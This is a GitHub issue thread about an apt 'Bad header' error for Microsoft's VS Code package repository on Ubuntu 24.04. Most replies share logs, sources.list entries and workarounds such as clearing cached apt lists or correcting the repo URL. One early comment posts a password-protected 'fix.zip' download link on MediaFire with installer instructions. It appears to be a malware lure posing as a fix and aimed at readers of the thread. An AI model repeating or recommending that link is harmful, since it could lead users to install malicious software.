### ISSUE TITLE
Ubuntu 24.04.1 LTS - Failed to fetch https://packages.microsoft.com/repos/code/dists/stable/InRelease  Bad header

### ISSUE THREAD

**Issue by NJT145** [microsoft/vscode#226935]
Does this issue occur when all extensions are disabled?: Yes/No

- VS Code Version: 1.92.2
- OS Version: Linux x64 6.8.0-41-generic (Ubuntu 24.04.1 LTS)

Steps to Reproduce:

1. `sudo apt update`
2. get this error: `Failed to fetch https://packages.microsoft.com/repos/code/dists/stable/InRelease  Bad header`

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hg42** [comment]
I get this error for three microsoft repos:
```
Warning: Failed to fetch https://packages.microsoft.com/debian/12/prod/dists/bookworm/InRelease  Bad header line Bad header data [IP: 2620:1ec:bdf::67 443]
Warning: Failed to fetch https://packages.microsoft.com/repos/edge/dists/stable/InRelease  Bad header line Bad header data [IP: 13.107.246.67 443]
Warning: Failed to fetch http://packages.microsoft.com/repos/code/dists/stable/InRelease  Bad header line Bad header data [IP: 2620:1ec:bdf::67 443]
```

I actually have `code 1.92.0-1722473020` installed, so it worked at least until then.
I run my updates manually, may be once a month.

I ran this command to clean the lists:
`sudo rm -rf /var/lib/apt/lists/* && sudo apt-get update`

As a result `code` package isn't found anywhere, and the installed `code` is declared to be "installed locally".

So, the lists are not loaded any more.

For a test (actually I thought I might get another version of `code`) I added the other dists of the repo,
and they didn't get this error.
I could see the packages included there inside aptitude, so the lists were indeed loaded:
```
  --\ microsoft-debian-bookworm-prod insiders-fast (1)
p   osconfig                                                <none>                    1.0.5.2024081501          (pin microsoft-debian-bookworm-prod insiders-fast: 0
  --\ microsoft-debian-bookworm-prod nightly (3)
p   mdatp                                                   <none>                    101.24072.0000-insiderfas (pin microsoft-debian-bookworm-prod insiders-fast: 0
p   mde-netfilter                                           <none>                    100.69.73                 (pin microsoft-debian-bookworm-prod nightly:nightl 0
p   mde-netfilter-src                                       <none>                    100.69.73-2               (pin microsoft-debian-bookworm-prod nightly:nightl 0
  --\ microsoft-debian-bookworm-prod testing (7)
p   moby-buildx                                             <none>                    0.16.2-debian12u1         (pin microsoft-debian-bookworm-prod testing:testin 0
p   moby-cli                                                <none>                    27.1.2-debian12u1         (pin microsoft-debian-bookworm-prod testing:testin 0
p   moby-compose                                            <none>                    2.29.2-debian12u1         (pin microsoft-debian-bookworm-prod testing:testin 0
p   moby-containerd                                         <none>                    1.7.20-debian12u1         (pin microsoft-debian-bookworm-prod testing:testin 0
p   moby-engine                                             <none>                    27.1.2-debian12u1         (pin microsoft-debian-bookworm-prod testing:testin 0
p   moby-runc                                               <none>                    1.1.13-debian12u1         (pin microsoft-debian-bookworm-prod testing:testin 0
p   moby-tini                                               <none>                    0.19.0-debian12u1         (pin microsoft-debian-bookworm-prod testing:testin 0
```

Before you ask, this is my current sources list for ms-code packages:
```
#deb [arch=amd64 signed-by=/usr/share/keyrings/microsoft-prod.gpg] https://packages.microsoft.com/debian/12/prod bookworm main
deb [arch=amd64] https://packages.microsoft.com/debian/12/prod bookworm main
deb [arch=amd64] https://packages.microsoft.com/debian/12/prod testing main
deb [arch=amd64] https://packages.microsoft.com/debian/12/prod nightly main
deb [arch=amd64] https://packages.microsoft.com/debian/12/prod insiders-fast main
deb [arch=amd64] https://packages.microsoft.com/debian/12/prod insiders-slow main
```
the disabled line was the original, I only changed it to use trusted.d instead, because of some scripts I used that work with all the keys.

It doesn't matter.

I also tried other things in case the keys would be wrong. E.g. I downloaded Release.gpg and stored it in trusted.d.

I am not 100% sure, but because the other dists work and I did not add more keys (I have three for: code, edge, and packages), I think the keys work.

**Comment by hg42** [comment]
> Workaround:
> sudo rm -rf /var/lib/apt/lists/* && sudo apt-get update

for me this didn't help (as I wrote)

I have this for months, I regularly use those cleaning commands.

**Comment by sunscreem** [comment]
Adding my +1 I'm afraid.

**Comment by geoschwa** [comment]
The Error disapeared on my system without doing anything.

**Comment by hg42** [comment]
yes, on my system it's gone, too.
Not sure what happened.
Maybe it was gone after deinstalling gpg*-sq (well, who installed this? it caused some failed keys of a few repos), but as far as I remember, the vscode problem was the only one leftover after deinstalling gpg*-sq.
But I wouldn't swear.
Perhaps another step was necessary to solve this problem.

**Comment by earnestware** [comment]
same problem, nothing works lol

**Comment by renkman** [comment]
> All you should need to do is `sudo apt clean && sudo apt autoclean && sudo apt update`

Thanks @NCC-IP, I had the same problem, this helped for me.

**Comment by famdude** [comment]
I used proxy with `apt` and it fixed the problem.
It seems that microsoft bans some IPs.

**Comment by andybalaam** [comment]
I got an error like the above when I was mistakenly using the wrong repo url: `https://packages.microsoft.com/repos/vscode`. When I changed it to `https://packages.microsoft.com/repos/code`, it worked OK.

(The change is from `vscode` to `code`.)

**Comment by darksylinc** [comment]
I'm having the same problem and I'm utterly confused.

1. I have a Desktop PC, connected over Ethernet. Updates fine.
2. I have a laptop PC, connected over WiFi. Gets this error.
3. Both are same distro (Xubuntu 24.04.1 LTS) with same router and internet infrastructure.
4. These systems do not mach 1:1 in packages installed though.

I tried all given solutions but the problem persists.

**Comment by n00b-t00b** [comment]
> I got an error like the above when I was mistakenly using the wrong repo url: `https://packages.microsoft.com/repos/vscode`. When I changed it to `https://packages.microsoft.com/repos/code`, it worked OK.
> 
> (The change is from `vscode` to `code`.)

Thank you this was it for me, odd it worked up until 1.94.2-1728494015

**Comment by rzhao271** [comment]
I am closing this issue due to it being a transient upstream issue.
One workaround for those still encountering this issue is to do an uninstall + purge* and reinstall.

*e.g. dpkg -P for dpkg users, not sure for other package managers

**Comment by ahmed-abderraham** [comment]
So, break people's vscode linux installations, then close issue recommeding to just purge and reinstall. Some things in Microsoft never change I guess. Embrace, extend, and extinguish.

**Comment by soy-caminante** [comment]
I guess I'm a bit late, but who knows...

I ran into the same issue and I found the solution. At least a solution that works for me.

The issue, in my case, was related with the Ubuntu distro upgrade to 24.04. It changed the apt sources and it caused the problems. The upgrade migration process added some files to the apt sources with the extension .distUpgrade, one of the for vscode.  -> vscode.list.distUpgrade. 

I realized that the vscode.list.distUpgrade content was this:

deb [arch=amd64,arm64,armhf] http://packages.microsoft.com/repos/code stable main

And I supposed that the connection rejection from micrsoft server was related with gpg sign. So I checked I have the microsoft gpg key in /etc/apt/keyrings/ and I modified the vscode.list.distUpgrade file as follows:

deb [arch=amd64,arm64,armhf signed-by=/etc/apt/keyrings/packages.microsoft.gpg] http://packages.microsoft.com/repos/code stable main 

(I'm not a linux expert. I found in another apt souces files that the source was signed with a gpg key and I supposed that the microsoft sources should be signed too, so I tried).

After doing this I ran  sudo apt-get update and it failed again so I tried with:

sudo rm -rf /var/lib/apt/lists/* && sudo apt-get update

And now it is working.

Before I get there I tried several things like following the instructions presented here:

[https://code.visualstudio.com/docs/setup/linux#:%7E:text=sudo%20apt%2Dget%20install%20wget,rm%20%2Df%20packages.microsoft.gpg](url)

Which didn't solve the problem, but maybe changed something in the apt sources (maybe adding the gpg key. I don't know if it was already in my system before I tried the microsoft instructions).

Hope this helps.

**Comment by petr-svarc** [comment]
Hi all,
I stumbled upon the same problem and thanks to these comment I was able to solve that.

Just a quick note: no need to delete all the cached apt lists from `/var/lib/apt/lists/`, removing the Microsoft's ones is sufficient. They are those `packages.microsoft.com*` files. So running `sudo rm /var/lib/apt/lists/packages.microsoft.com*` is sufficient.

Also check, if there are any such files in the `/var/lib/apt/lists/partial/` folder and delete those as well. I had one file there - `packages.microsoft.com_repos_code_dists_stable_InRelease`.

Running `apt update` then works just fine.

IMHO the distribution file in the repo gets modified incorrectly, which breaks the caching on the local machine.
